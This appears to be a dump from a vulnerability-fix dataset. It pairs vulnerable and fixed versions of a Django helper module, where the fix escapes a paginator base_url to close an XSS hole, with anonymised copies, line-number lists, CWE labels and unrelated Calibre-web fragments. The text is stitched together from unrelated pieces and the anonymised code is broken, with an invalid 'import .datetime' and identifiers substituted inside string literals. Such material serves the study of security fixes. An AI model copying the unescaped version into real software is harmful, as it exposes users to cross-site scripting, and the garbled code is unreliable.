def FUNC_38(VAR_41):
if VAR_45:
VAR_98 = scholarly.search_pubs(' '.join(VAR_41.split('+')))
VAR_99=0
VAR_68 = []
for publication in VAR_98:
del publication['source']
VAR_68.append(publication)
VAR_99+=1
if(VAR_99>=10):
break
return Response(json.dumps(VAR_68),mimetype='application/json')
else:
return "[]"
@VAR_0.route("/ajax/editbooks/<VAR_42>", methods=['POST'])
@login_required_if_no_ano
@FUNC_1
def FUNC_39(VAR_42):
VAR_79 = VAR_31.form.to_dict()
VAR_16 = calibre_db.get_book(VAR_79['pk'])
VAR_80 = ""
if VAR_42 =='series_index':
FUNC_18(VAR_79['value'], VAR_16)
VAR_80 = Response(json.dumps({'success': True, 'newValue': VAR_16.series_index}), mimetype='application/json')
elif VAR_42 =='tags':
FUNC_16(VAR_79['value'], VAR_16)
VAR_80 = Response(json.dumps({'success': True, 'newValue': ', '.join([tag.name for tag in VAR_16.tags])}),
mimetype='application/json')
elif VAR_42 =='series':
FUNC_17(VAR_79['value'], VAR_16)
VAR_80 = Response(json.dumps({'success': True, 'newValue': ', '.join([serie.name for serie in VAR_16.series])}),
mimetype='application/json')
elif VAR_42 =='publishers':
FUNC_21(VAR_79['value'], VAR_16)
VAR_80 = Response(json.dumps({'success': True,
'newValue': ', '.join([VAR_86.name for VAR_86 in VAR_16.publishers])}),
mimetype='application/json')
elif VAR_42 =='languages':
VAR_26 = list()
FUNC_20(VAR_79['value'], VAR_16, VAR_26=invalid)
if VAR_26:
VAR_80 = Response(json.dumps({'success': False,
'msg': 'Invalid VAR_24 in VAR_31: {}'.format(','.join(VAR_26))}),
mimetype='application/json')
else:
VAR_121 = list()
for lang in VAR_16.languages:
try:
VAR_121.append(LC.parse(lang.lang_code).get_language_name(get_locale()))
except UnknownLocaleError:
VAR_121.append(_(isoLanguages.get(part3=lang.lang_code).name))
VAR_80 = Response(json.dumps({'success': True, 'newValue': ', '.join(VAR_121)}),
mimetype='application/json')
elif VAR_42 =='author_sort':
VAR_16.author_sort = VAR_79['value']
VAR_80 = Response(json.dumps({'success': True, 'newValue': VAR_16.author_sort}),
mimetype='application/json')
elif VAR_42 == 'title':
VAR_124 = VAR_16.sort
FUNC_27(VAR_16, VAR_79.get('value', ""))
helper.update_dir_stucture(VAR_16.id, config.config_calibre_dir)
VAR_80 = Response(json.dumps({'success': True, 'newValue': VAR_16.title}),
mimetype='application/json')
elif VAR_42 =='sort':
VAR_16.sort = VAR_79['value']
VAR_80 = Response(json.dumps({'success': True, 'newValue': VAR_16.sort}),
mimetype='application/json')
elif VAR_42 =='authors':
VAR_62, VAR_125 = FUNC_28(VAR_16, VAR_79['value'], VAR_79.get('checkA', None) == "true")
helper.update_dir_stucture(VAR_16.id, config.config_calibre_dir, VAR_62[0])
VAR_80 = Response(json.dumps({'success': True,
'newValue': ' & '.join([author.replace('|',',') for author in VAR_62])}),
mimetype='application/json')
VAR_16.last_modified = datetime.utcnow()
try:
calibre_db.session.commit()
if VAR_42 == 'title' and VAR_79.get('checkT') == "false":
VAR_16.sort = VAR_124
calibre_db.session.commit()
except (OperationalError, IntegrityError) as e:
calibre_db.session.rollback()
VAR_1.error("Database VAR_49: %s", e)
return VAR_80
@VAR_0.route("/ajax/sort_value/<VAR_43>/<int:VAR_44>")
@login_required
def FUNC_40(VAR_43, VAR_44):
if VAR_43 in ['title', 'authors', 'sort', 'author_sort']:
VAR_16 = calibre_db.get_filtered_book(VAR_44)
if VAR_16:
if VAR_43 == 'title':
return json.dumps({'sort': VAR_16.sort})
elif VAR_43 == 'authors':
return json.dumps({'author_sort': VAR_16.author_sort})
if VAR_43 == 'sort':
return json.dumps({'sort': VAR_16.title})
if VAR_43 == 'author_sort':
return json.dumps({'author_sort': VAR_16.author})
return ""
@VAR_0.route("/ajax/simulatemerge", methods=['POST'])
@login_required
@FUNC_1
def FUNC_41():
VAR_79 = VAR_31.get_json().get('Merge_books')
if VAR_79:
VAR_100 = calibre_db.get_book(VAR_79[0]).title
VAR_79.pop(0)
if VAR_100:
for VAR_14 in VAR_79:
VAR_118 = []
VAR_118.append(calibre_db.get_book(VAR_14).title)
return json.dumps({'to': VAR_100, 'from': VAR_118})
return ""
@VAR_0.route("/ajax/mergebooks", methods=['POST'])
@login_required
@FUNC_1
def FUNC_42():
VAR_79 = VAR_31.get_json().get('Merge_books')
VAR_81 = list()
if VAR_79:
VAR_100 = calibre_db.get_book(VAR_79[0])
VAR_79.pop(0)
if VAR_100:
for file in VAR_100.data:
VAR_81.append(file.format)
VAR_114 = helper.get_valid_filename(VAR_100.title) + ' - ' + \
helper.get_valid_filename(VAR_100.authors[0].name)
for VAR_14 in VAR_79:
VAR_118 = calibre_db.get_book(VAR_14)
if VAR_118:
for element in VAR_118.data:
if element.format not in VAR_81:
VAR_122 = os.path.normpath(os.path.join(config.config_calibre_dir,
VAR_100.path,
VAR_114 + "." + element.format.lower()))
VAR_123 = os.path.normpath(os.path.join(config.config_calibre_dir,
VAR_118.path,
element.name + "." + element.format.lower()))
copyfile(VAR_123, VAR_122)
VAR_100.data.append(db.Data(VAR_100.id,
element.format,
element.uncompressed_size,
VAR_114))
FUNC_13(VAR_118.id,"", True)
return json.dumps({'success': True})
return ""
@VAR_0.route("/ajax/xchange", methods=['POST'])
@login_required
@FUNC_1
def FUNC_43():
VAR_79 = VAR_31.get_json().get('xchange')
if VAR_79:
for val in VAR_79:
VAR_38 = False
VAR_16 = calibre_db.get_book(val)
VAR_115 = VAR_16.title
VAR_116 = calibre_db.order_authors(VAR_16)
VAR_53 = []
for VAR_37 in VAR_116.authors:
VAR_53.append(VAR_37.name.replace('|', ','))
VAR_91 = FUNC_27(VAR_16, " ".join(VAR_53))
VAR_62, VAR_92 = FUNC_28(VAR_16, VAR_115)
if VAR_92 or VAR_91:
VAR_90 = VAR_16.id
VAR_38 = True
if config.config_use_google_drive:
gdriveutils.updateGdriveCalibreFromLocal()
if VAR_90:
helper.update_dir_stucture(VAR_90, config.config_calibre_dir, VAR_62[0])
if VAR_38:
VAR_16.last_modified = datetime.utcnow()
try:
calibre_db.session.commit()
except (OperationalError, IntegrityError) as e:
calibre_db.session.rollback()
VAR_1.error("Database VAR_49: %s", e)
return json.dumps({'success': False})
if config.config_use_google_drive:
gdriveutils.updateGdriveCalibreFromLocal()
return json.dumps({'success': True})
return ""
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
20,
21,
22,
29,
30,
37,
38,
53,
58,
59,
62,
63,
70,
72,
79,
81,
94,
97,
101,
102,
120,
121,
131,
141,
143,
144,
162,
166,
167,
190,
191,
192,
193,
195,
199,
200,
202,
204,
206,
210,
211,
222,
231,
237,
242,
243,
249,
250,
252,
257,
258,
259,
265,
295,
296,
316,
317,
359,
361,
364,
365,
372,
375,
377,
381,
382,
394,
395,
408,
409,
432,
436,
439,
440,
445,
446,
448,
458,
459,
471,
472,
486,
488,
489,
493,
496,
497,
508,
509,
523,
540,
541,
548,
557,
565,
568,
569,
587,
602,
604,
607,
620,
624,
625,
637,
640,
641,
655,
656,
660,
664,
665,
669,
680,
681,
683,
691,
692,
694,
697,
699,
702,
704,
705,
706,
720,
721,
727,
728,
734,
735,
738,
740,
741,
745,
753,
755,
756,
758,
763,
766,
770,
785,
786,
788,
790,
796,
798,
800,
802,
804,
806,
808,
816,
837,
838,
851,
852,
866,
867,
875,
876,
878,
880,
882,
883,
886,
904,
905,
910,
913,
914,
916,
917,
920,
923,
924,
926,
927,
929,
930,
932,
933,
935,
936,
938,
939,
944,
945,
948,
950,
961,
962,
971,
972,
974,
989,
990,
1001,
1004,
1008,
1010,
1011,
1013,
1016,
1022,
1024,
1025,
1027,
1035,
1048,
1053,
1056,
1060,
1064,
1072,
1090,
1153,
1161,
1162,
1178,
1179,
1194,
1195,
1203,
1216,
1231,
1246,
1252,
1255,
1266,
1271,
213,
214,
215,
854
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
20,
21,
22,
30,
31,
37,
52,
57,
58,
59,
60,
63,
64,
71,
73,
80,
82,
95,
98,
102,
103,
121,
122,
132,
142,
144,
145,
163,
167,
168,
191,
192,
193,
194,
196,
200,
201,
203,
205,
207,
211,
212,
223,
232,
238,
243,
244,
250,
251,
253,
258,
259,
260,
266,
296,
297,
317,
318,
360,
362,
365,
366,
373,
376,
378,
382,
383,
395,
396,
409,
410,
433,
437,
440,
441,
446,
447,
449,
459,
460,
474,
475,
489,
491,
492,
496,
499,
500,
511,
512,
528,
545,
546,
553,
562,
570,
573,
574,
592,
607,
609,
612,
625,
629,
630,
642,
645,
646,
660,
661,
665,
669,
670,
674,
685,
686,
688,
696,
697,
699,
702,
704,
707,
709,
710,
711,
725,
726,
732,
733,
739,
740,
743,
745,
746,
750,
758,
760,
761,
763,
768,
771,
775,
790,
791,
793,
795,
801,
803,
805,
807,
809,
811,
813,
821,
842,
843,
856,
857,
871,
872,
880,
881,
883,
885,
887,
888,
891,
909,
910,
915,
918,
919,
921,
922,
925,
928,
929,
931,
932,
934,
935,
937,
938,
940,
941,
943,
944,
949,
950,
953,
955,
966,
967,
976,
977,
979,
994,
995,
1006,
1009,
1013,
1015,
1016,
1018,
1021,
1027,
1029,
1030,
1032,
1040,
1053,
1058,
1061,
1065,
1069,
1077,
1095,
1158,
1166,
1167,
1183,
1184,
1199,
1200,
1208,
1221,
1236,
1251,
1257,
1260,
1271,
1276,
214,
215,
216,
859
] |
1CWE-79
| import re
import random
import datetime
from django.utils.translation import ugettext as _
from django.utils.translation import ungettext
def get_from_dict_or_object(source, key):
try:
return source[key]
except:
return getattr(source, key)
def enumerate_string_list(strings):
"""for a list or a tuple ('one', 'two',) return
a list formatted as ['1) one', '2) two',]
"""
numbered_strings = enumerate(strings, start = 1)
return [ '%d) %s' % item for item in numbered_strings ]
def pad_string(text):
"""Inserts one space between words,
including one space before the first word
and after the last word.
String without words is collapsed to ''
"""
words = text.strip().split()
if len(words) > 0:
return ' ' + ' '.join(words) + ' '
else:
return ''
def split_list(text):
"""Takes text, representing a loosely formatted
list (comma, semicolon, empty space separated
words) and returns a list() of words.
"""
text = text.replace(',', ' ').replace(';', ' ')
return text.strip().split()
def is_iterable(thing):
if hasattr(thing, '__iter__'):
return True
else:
return isinstance(thing, basestring)
BOT_REGEX = re.compile(
r'bot|http|\.com|crawl|spider|python|curl|yandex'
)
BROWSER_REGEX = re.compile(
r'^(Mozilla.*(Gecko|KHTML|MSIE|Presto|Trident)|Opera).*$'
)
MOBILE_REGEX = re.compile(
r'(BlackBerry|HTC|LG|MOT|Nokia|NOKIAN|PLAYSTATION|PSP|SAMSUNG|SonyEricsson)'
)
def strip_plus(text):
"""returns text with redundant spaces replaced with just one,
and stripped leading and the trailing spaces"""
return re.sub('\s+', ' ', text).strip()
def not_a_robot_request(request):
if 'HTTP_ACCEPT_LANGUAGE' not in request.META:
return False
user_agent = request.META.get('HTTP_USER_AGENT', None)
if user_agent is None:
return False
if BOT_REGEX.match(user_agent, re.IGNORECASE):
return False
if MOBILE_REGEX.match(user_agent):
return True
if BROWSER_REGEX.search(user_agent):
return True
return False
def diff_date(date, use_on_prefix = False):
now = datetime.datetime.now()#datetime(*time.localtime()[0:6])#???
diff = now - date
days = diff.days
hours = int(diff.seconds/3600)
minutes = int(diff.seconds/60)
if days > 2:
if date.year == now.year:
date_token = date.strftime("%b %d")
else:
date_token = date.strftime("%b %d '%y")
if use_on_prefix:
return _('on %(date)s') % { 'date': date_token }
else:
return date_token
elif days == 2:
return _('2 days ago')
elif days == 1:
return _('yesterday')
elif minutes >= 60:
return ungettext(
'%(hr)d hour ago',
'%(hr)d hours ago',
hours
) % {'hr':hours}
else:
return ungettext(
'%(min)d min ago',
'%(min)d mins ago',
minutes
) % {'min':minutes}
#todo: this function may need to be removed to simplify the paginator functionality
LEADING_PAGE_RANGE_DISPLAYED = TRAILING_PAGE_RANGE_DISPLAYED = 5
LEADING_PAGE_RANGE = TRAILING_PAGE_RANGE = 4
NUM_PAGES_OUTSIDE_RANGE = 1
ADJACENT_PAGES = 2
def setup_paginator(context):
"""
custom paginator tag
Inspired from http://blog.localkinegrinds.com/2007/09/06/digg-style-pagination-in-django/
"""
if (context["is_paginated"]):
" Initialize variables "
in_leading_range = in_trailing_range = False
pages_outside_leading_range = pages_outside_trailing_range = range(0)
if (context["pages"] <= LEADING_PAGE_RANGE_DISPLAYED):
in_leading_range = in_trailing_range = True
page_numbers = [n for n in range(1, context["pages"] + 1) if n > 0 and n <= context["pages"]]
elif (context["current_page_number"] <= LEADING_PAGE_RANGE):
in_leading_range = True
page_numbers = [n for n in range(1, LEADING_PAGE_RANGE_DISPLAYED + 1) if n > 0 and n <= context["pages"]]
pages_outside_leading_range = [n + context["pages"] for n in range(0, -NUM_PAGES_OUTSIDE_RANGE, -1)]
elif (context["current_page_number"] > context["pages"] - TRAILING_PAGE_RANGE):
in_trailing_range = True
page_numbers = [n for n in range(context["pages"] - TRAILING_PAGE_RANGE_DISPLAYED + 1, context["pages"] + 1) if n > 0 and n <= context["pages"]]
pages_outside_trailing_range = [n + 1 for n in range(0, NUM_PAGES_OUTSIDE_RANGE)]
else:
page_numbers = [n for n in range(context["current_page_number"] - ADJACENT_PAGES, context["current_page_number"] + ADJACENT_PAGES + 1) if n > 0 and n <= context["pages"]]
pages_outside_leading_range = [n + context["pages"] for n in range(0, -NUM_PAGES_OUTSIDE_RANGE, -1)]
pages_outside_trailing_range = [n + 1 for n in range(0, NUM_PAGES_OUTSIDE_RANGE)]
page_object = context['page_object']
#patch for change in django 1.5
if page_object.has_previous():
previous_page_number = page_object.previous_page_number()
else:
previous_page_number = None
if page_object.has_next():
next_page_number = page_object.next_page_number()
else:
next_page_number = None
return {
"base_url": context["base_url"],
"is_paginated": context["is_paginated"],
"previous": previous_page_number,
"has_previous": page_object.has_previous(),
"next": next_page_number,
"has_next": page_object.has_next(),
"page": context["current_page_number"],
"pages": context["pages"],
"page_numbers": page_numbers,
"in_leading_range" : in_leading_range,
"in_trailing_range" : in_trailing_range,
"pages_outside_leading_range": pages_outside_leading_range,
"pages_outside_trailing_range": pages_outside_trailing_range,
}
def get_admin():
"""Returns an admin users, usefull for raising flags"""
try:
from django.contrib.auth.models import User
return User.objects.filter(is_superuser=True)[0]
except:
raise Exception('there is no admin users')
def generate_random_key(length=16):
"""return random string, length is number of characters"""
random.seed()
assert(isinstance(length, int))
format_string = '%0' + str(2*length) + 'x'
return format_string % random.getrandbits(length*8)
| import re
import random
import datetime
from django.utils.translation import ugettext as _
from django.utils.translation import ungettext
from django.utils.html import escape
def get_from_dict_or_object(source, key):
try:
return source[key]
except:
return getattr(source, key)
def enumerate_string_list(strings):
"""for a list or a tuple ('one', 'two',) return
a list formatted as ['1) one', '2) two',]
"""
numbered_strings = enumerate(strings, start = 1)
return [ '%d) %s' % item for item in numbered_strings ]
def pad_string(text):
"""Inserts one space between words,
including one space before the first word
and after the last word.
String without words is collapsed to ''
"""
words = text.strip().split()
if len(words) > 0:
return ' ' + ' '.join(words) + ' '
else:
return ''
def split_list(text):
"""Takes text, representing a loosely formatted
list (comma, semicolon, empty space separated
words) and returns a list() of words.
"""
text = text.replace(',', ' ').replace(';', ' ')
return text.strip().split()
def is_iterable(thing):
if hasattr(thing, '__iter__'):
return True
else:
return isinstance(thing, basestring)
BOT_REGEX = re.compile(
r'bot|http|\.com|crawl|spider|python|curl|yandex'
)
BROWSER_REGEX = re.compile(
r'^(Mozilla.*(Gecko|KHTML|MSIE|Presto|Trident)|Opera).*$'
)
MOBILE_REGEX = re.compile(
r'(BlackBerry|HTC|LG|MOT|Nokia|NOKIAN|PLAYSTATION|PSP|SAMSUNG|SonyEricsson)'
)
def strip_plus(text):
"""returns text with redundant spaces replaced with just one,
and stripped leading and the trailing spaces"""
return re.sub('\s+', ' ', text).strip()
def not_a_robot_request(request):
if 'HTTP_ACCEPT_LANGUAGE' not in request.META:
return False
user_agent = request.META.get('HTTP_USER_AGENT', None)
if user_agent is None:
return False
if BOT_REGEX.match(user_agent, re.IGNORECASE):
return False
if MOBILE_REGEX.match(user_agent):
return True
if BROWSER_REGEX.search(user_agent):
return True
return False
def diff_date(date, use_on_prefix = False):
now = datetime.datetime.now()#datetime(*time.localtime()[0:6])#???
diff = now - date
days = diff.days
hours = int(diff.seconds/3600)
minutes = int(diff.seconds/60)
if days > 2:
if date.year == now.year:
date_token = date.strftime("%b %d")
else:
date_token = date.strftime("%b %d '%y")
if use_on_prefix:
return _('on %(date)s') % { 'date': date_token }
else:
return date_token
elif days == 2:
return _('2 days ago')
elif days == 1:
return _('yesterday')
elif minutes >= 60:
return ungettext(
'%(hr)d hour ago',
'%(hr)d hours ago',
hours
) % {'hr':hours}
else:
return ungettext(
'%(min)d min ago',
'%(min)d mins ago',
minutes
) % {'min':minutes}
#todo: this function may need to be removed to simplify the paginator functionality
LEADING_PAGE_RANGE_DISPLAYED = TRAILING_PAGE_RANGE_DISPLAYED = 5
LEADING_PAGE_RANGE = TRAILING_PAGE_RANGE = 4
NUM_PAGES_OUTSIDE_RANGE = 1
ADJACENT_PAGES = 2
def setup_paginator(context):
"""
custom paginator tag
Inspired from http://blog.localkinegrinds.com/2007/09/06/digg-style-pagination-in-django/
"""
if (context["is_paginated"]):
" Initialize variables "
in_leading_range = in_trailing_range = False
pages_outside_leading_range = pages_outside_trailing_range = range(0)
if (context["pages"] <= LEADING_PAGE_RANGE_DISPLAYED):
in_leading_range = in_trailing_range = True
page_numbers = [n for n in range(1, context["pages"] + 1) if n > 0 and n <= context["pages"]]
elif (context["current_page_number"] <= LEADING_PAGE_RANGE):
in_leading_range = True
page_numbers = [n for n in range(1, LEADING_PAGE_RANGE_DISPLAYED + 1) if n > 0 and n <= context["pages"]]
pages_outside_leading_range = [n + context["pages"] for n in range(0, -NUM_PAGES_OUTSIDE_RANGE, -1)]
elif (context["current_page_number"] > context["pages"] - TRAILING_PAGE_RANGE):
in_trailing_range = True
page_numbers = [n for n in range(context["pages"] - TRAILING_PAGE_RANGE_DISPLAYED + 1, context["pages"] + 1) if n > 0 and n <= context["pages"]]
pages_outside_trailing_range = [n + 1 for n in range(0, NUM_PAGES_OUTSIDE_RANGE)]
else:
page_numbers = [n for n in range(context["current_page_number"] - ADJACENT_PAGES, context["current_page_number"] + ADJACENT_PAGES + 1) if n > 0 and n <= context["pages"]]
pages_outside_leading_range = [n + context["pages"] for n in range(0, -NUM_PAGES_OUTSIDE_RANGE, -1)]
pages_outside_trailing_range = [n + 1 for n in range(0, NUM_PAGES_OUTSIDE_RANGE)]
page_object = context['page_object']
#patch for change in django 1.5
if page_object.has_previous():
previous_page_number = page_object.previous_page_number()
else:
previous_page_number = None
if page_object.has_next():
next_page_number = page_object.next_page_number()
else:
next_page_number = None
return {
"base_url": escape(context["base_url"]),
"is_paginated": context["is_paginated"],
"previous": previous_page_number,
"has_previous": page_object.has_previous(),
"next": next_page_number,
"has_next": page_object.has_next(),
"page": context["current_page_number"],
"pages": context["pages"],
"page_numbers": page_numbers,
"in_leading_range" : in_leading_range,
"in_trailing_range" : in_trailing_range,
"pages_outside_leading_range": pages_outside_leading_range,
"pages_outside_trailing_range": pages_outside_trailing_range,
}
def get_admin():
"""Returns an admin users, usefull for raising flags"""
try:
from django.contrib.auth.models import User
return User.objects.filter(is_superuser=True)[0]
except:
raise Exception('there is no admin users')
def generate_random_key(length=16):
"""return random string, length is number of characters"""
random.seed()
assert(isinstance(length, int))
format_string = '%0' + str(2*length) + 'x'
return format_string % random.getrandbits(length*8)
| xss | {
"code": [
" \"base_url\": context[\"base_url\"],"
],
"line_no": [
161
]
} | {
"code": [
" \"base_url\": escape(context[\"base_url\"]),"
],
"line_no": [
162
]
} | import re
import random
import .datetime
from django.utils.translation import ugettext as _
from django.utils.translation import ungettext
def FUNC_0(VAR_0, VAR_1):
try:
return VAR_0[VAR_1]
except:
return getattr(VAR_0, VAR_1)
def FUNC_1(VAR_2):
VAR_19 = enumerate(VAR_2, start = 1)
return [ '%d) %s' % item for item in VAR_19 ]
def FUNC_2(VAR_3):
VAR_20 = VAR_3.strip().split()
if len(VAR_20) > 0:
return ' ' + ' '.join(VAR_20) + ' '
else:
return ''
def FUNC_3(VAR_3):
VAR_3 = VAR_3.replace(',', ' ').replace(';', ' ')
return VAR_3.strip().split()
def FUNC_4(VAR_4):
if hasattr(VAR_4, '__iter__'):
return True
else:
return isinstance(VAR_4, basestring)
VAR_5 = re.compile(
r'bot|http|\.com|crawl|spider|python|curl|yandex'
)
VAR_6 = re.compile(
r'^(Mozilla.*(Gecko|KHTML|MSIE|Presto|Trident)|Opera).*$'
)
VAR_7 = re.compile(
r'(BlackBerry|HTC|LG|MOT|Nokia|NOKIAN|PLAYSTATION|PSP|SAMSUNG|SonyEricsson)'
)
def FUNC_5(VAR_3):
return re.sub('\s+', ' ', VAR_3).strip()
def FUNC_6(VAR_8):
if 'HTTP_ACCEPT_LANGUAGE' not in VAR_8.META:
return False
VAR_21 = VAR_8.META.get('HTTP_USER_AGENT', None)
if VAR_21 is None:
return False
if VAR_5.match(VAR_21, re.IGNORECASE):
return False
if VAR_7.match(VAR_21):
return True
if VAR_6.search(VAR_21):
return True
return False
def FUNC_7(VAR_9, VAR_10 = False):
VAR_22 = datetime.datetime.now()#datetime(*time.localtime()[0:6])#???
VAR_23 = VAR_22 - VAR_9
VAR_24 = VAR_23.days
VAR_25 = int(VAR_23.seconds/3600)
VAR_26 = int(VAR_23.seconds/60)
if VAR_24 > 2:
if VAR_9.year == VAR_22.year:
VAR_33 = VAR_9.strftime("%b %d")
else:
VAR_33 = VAR_9.strftime("%b %d '%y")
if VAR_10:
return _('on %(VAR_9)s') % { 'date': VAR_33 }
else:
return VAR_33
elif VAR_24 == 2:
return _('2 VAR_24 ago')
elif VAR_24 == 1:
return _('yesterday')
elif VAR_26 >= 60:
return ungettext(
'%(hr)d hour ago',
'%(hr)d VAR_25 ago',
VAR_25
) % {'hr':VAR_25}
else:
return ungettext(
'%(min)d min ago',
'%(min)d mins ago',
VAR_26
) % {'min':VAR_26}
VAR_11 = VAR_12 = 5
VAR_13 = VAR_14 = 4
VAR_15 = 1
VAR_16 = 2
def FUNC_8(VAR_17):
if (VAR_17["is_paginated"]):
" Initialize variables "
VAR_28 = VAR_29 = False
VAR_30 = VAR_31 = range(0)
if (VAR_17["pages"] <= VAR_11):
VAR_28 = VAR_29 = True
VAR_34 = [n for n in range(1, VAR_17["pages"] + 1) if n > 0 and n <= VAR_17["pages"]]
elif (VAR_17["current_page_number"] <= VAR_13):
VAR_28 = True
VAR_34 = [n for n in range(1, VAR_11 + 1) if n > 0 and n <= VAR_17["pages"]]
VAR_30 = [n + VAR_17["pages"] for n in range(0, -VAR_15, -1)]
elif (VAR_17["current_page_number"] > VAR_17["pages"] - VAR_14):
VAR_29 = True
VAR_34 = [n for n in range(VAR_17["pages"] - VAR_12 + 1, VAR_17["pages"] + 1) if n > 0 and n <= VAR_17["pages"]]
VAR_31 = [n + 1 for n in range(0, VAR_15)]
else:
VAR_34 = [n for n in range(VAR_17["current_page_number"] - VAR_16, VAR_17["current_page_number"] + VAR_16 + 1) if n > 0 and n <= VAR_17["pages"]]
VAR_30 = [n + VAR_17["pages"] for n in range(0, -VAR_15, -1)]
VAR_31 = [n + 1 for n in range(0, VAR_15)]
VAR_32 = VAR_17['page_object']
if VAR_32.has_previous():
VAR_35 = VAR_32.previous_page_number()
else:
VAR_35 = None
if VAR_32.has_next():
VAR_36 = VAR_32.next_page_number()
else:
VAR_36 = None
return {
"base_url": VAR_17["base_url"],
"is_paginated": VAR_17["is_paginated"],
"previous": VAR_35,
"has_previous": VAR_32.has_previous(),
"next": VAR_36,
"has_next": VAR_32.has_next(),
"page": VAR_17["current_page_number"],
"pages": VAR_17["pages"],
"page_numbers": VAR_34,
"in_leading_range" : VAR_28,
"in_trailing_range" : VAR_29,
"pages_outside_leading_range": VAR_30,
"pages_outside_trailing_range": VAR_31,
}
def FUNC_9():
try:
from django.contrib.auth.models import User
return User.objects.filter(is_superuser=True)[0]
except:
raise Exception('there is no admin users')
def FUNC_10(VAR_18=16):
random.seed()
assert(isinstance(VAR_18, int))
VAR_27 = '%0' + str(2*VAR_18) + 'x'
return VAR_27 % random.getrandbits(VAR_18*8)
| import re
import random
import .datetime
from django.utils.translation import ugettext as _
from django.utils.translation import ungettext
from django.utils.html import escape
def FUNC_0(VAR_0, VAR_1):
try:
return VAR_0[VAR_1]
except:
return getattr(VAR_0, VAR_1)
def FUNC_1(VAR_2):
VAR_19 = enumerate(VAR_2, start = 1)
return [ '%d) %s' % item for item in VAR_19 ]
def FUNC_2(VAR_3):
VAR_20 = VAR_3.strip().split()
if len(VAR_20) > 0:
return ' ' + ' '.join(VAR_20) + ' '
else:
return ''
def FUNC_3(VAR_3):
VAR_3 = VAR_3.replace(',', ' ').replace(';', ' ')
return VAR_3.strip().split()
def FUNC_4(VAR_4):
if hasattr(VAR_4, '__iter__'):
return True
else:
return isinstance(VAR_4, basestring)
VAR_5 = re.compile(
r'bot|http|\.com|crawl|spider|python|curl|yandex'
)
VAR_6 = re.compile(
r'^(Mozilla.*(Gecko|KHTML|MSIE|Presto|Trident)|Opera).*$'
)
VAR_7 = re.compile(
r'(BlackBerry|HTC|LG|MOT|Nokia|NOKIAN|PLAYSTATION|PSP|SAMSUNG|SonyEricsson)'
)
def FUNC_5(VAR_3):
return re.sub('\s+', ' ', VAR_3).strip()
def FUNC_6(VAR_8):
if 'HTTP_ACCEPT_LANGUAGE' not in VAR_8.META:
return False
VAR_21 = VAR_8.META.get('HTTP_USER_AGENT', None)
if VAR_21 is None:
return False
if VAR_5.match(VAR_21, re.IGNORECASE):
return False
if VAR_7.match(VAR_21):
return True
if VAR_6.search(VAR_21):
return True
return False
def FUNC_7(VAR_9, VAR_10 = False):
VAR_22 = datetime.datetime.now()#datetime(*time.localtime()[0:6])#???
VAR_23 = VAR_22 - VAR_9
VAR_24 = VAR_23.days
VAR_25 = int(VAR_23.seconds/3600)
VAR_26 = int(VAR_23.seconds/60)
if VAR_24 > 2:
if VAR_9.year == VAR_22.year:
VAR_33 = VAR_9.strftime("%b %d")
else:
VAR_33 = VAR_9.strftime("%b %d '%y")
if VAR_10:
return _('on %(VAR_9)s') % { 'date': VAR_33 }
else:
return VAR_33
elif VAR_24 == 2:
return _('2 VAR_24 ago')
elif VAR_24 == 1:
return _('yesterday')
elif VAR_26 >= 60:
return ungettext(
'%(hr)d hour ago',
'%(hr)d VAR_25 ago',
VAR_25
) % {'hr':VAR_25}
else:
return ungettext(
'%(min)d min ago',
'%(min)d mins ago',
VAR_26
) % {'min':VAR_26}
VAR_11 = VAR_12 = 5
VAR_13 = VAR_14 = 4
VAR_15 = 1
VAR_16 = 2
def FUNC_8(VAR_17):
if (VAR_17["is_paginated"]):
" Initialize variables "
VAR_28 = VAR_29 = False
VAR_30 = VAR_31 = range(0)
if (VAR_17["pages"] <= VAR_11):
VAR_28 = VAR_29 = True
VAR_34 = [n for n in range(1, VAR_17["pages"] + 1) if n > 0 and n <= VAR_17["pages"]]
elif (VAR_17["current_page_number"] <= VAR_13):
VAR_28 = True
VAR_34 = [n for n in range(1, VAR_11 + 1) if n > 0 and n <= VAR_17["pages"]]
VAR_30 = [n + VAR_17["pages"] for n in range(0, -VAR_15, -1)]
elif (VAR_17["current_page_number"] > VAR_17["pages"] - VAR_14):
VAR_29 = True
VAR_34 = [n for n in range(VAR_17["pages"] - VAR_12 + 1, VAR_17["pages"] + 1) if n > 0 and n <= VAR_17["pages"]]
VAR_31 = [n + 1 for n in range(0, VAR_15)]
else:
VAR_34 = [n for n in range(VAR_17["current_page_number"] - VAR_16, VAR_17["current_page_number"] + VAR_16 + 1) if n > 0 and n <= VAR_17["pages"]]
VAR_30 = [n + VAR_17["pages"] for n in range(0, -VAR_15, -1)]
VAR_31 = [n + 1 for n in range(0, VAR_15)]
VAR_32 = VAR_17['page_object']
if VAR_32.has_previous():
VAR_35 = VAR_32.previous_page_number()
else:
VAR_35 = None
if VAR_32.has_next():
VAR_36 = VAR_32.next_page_number()
else:
VAR_36 = None
return {
"base_url": escape(VAR_17["base_url"]),
"is_paginated": VAR_17["is_paginated"],
"previous": VAR_35,
"has_previous": VAR_32.has_previous(),
"next": VAR_36,
"has_next": VAR_32.has_next(),
"page": VAR_17["current_page_number"],
"pages": VAR_17["pages"],
"page_numbers": VAR_34,
"in_leading_range" : VAR_28,
"in_trailing_range" : VAR_29,
"pages_outside_leading_range": VAR_30,
"pages_outside_trailing_range": VAR_31,
}
def FUNC_9():
try:
from django.contrib.auth.models import User
return User.objects.filter(is_superuser=True)[0]
except:
raise Exception('there is no admin users')
def FUNC_10(VAR_18=16):
random.seed()
assert(isinstance(VAR_18, int))
VAR_27 = '%0' + str(2*VAR_18) + 'x'
return VAR_27 % random.getrandbits(VAR_18*8)
| [
6,
12,
13,
20,
32,
40,
46,
56,
57,
62,
63,
65,
68,
72,
75,
78,
81,
83,
90,
116,
117,
131,
147,
149,
154,
159,
175,
183,
190,
15,
16,
17,
22,
23,
24,
25,
26,
34,
35,
36,
37,
59,
60,
123,
124,
125,
126,
177,
185
] | [
7,
13,
14,
21,
33,
41,
47,
57,
58,
63,
64,
66,
69,
73,
76,
79,
82,
84,
91,
117,
118,
132,
148,
150,
155,
160,
176,
184,
191,
16,
17,
18,
23,
24,
25,
26,
27,
35,
36,
37,
38,
60,
61,
124,
125,
126,
127,
178,
186
] |
0CWE-22
| import glob
import os
import sys
from collections import defaultdict
from functools import partial as curry
from . import (
biblio,
boilerplate,
caniuse,
conditional,
config,
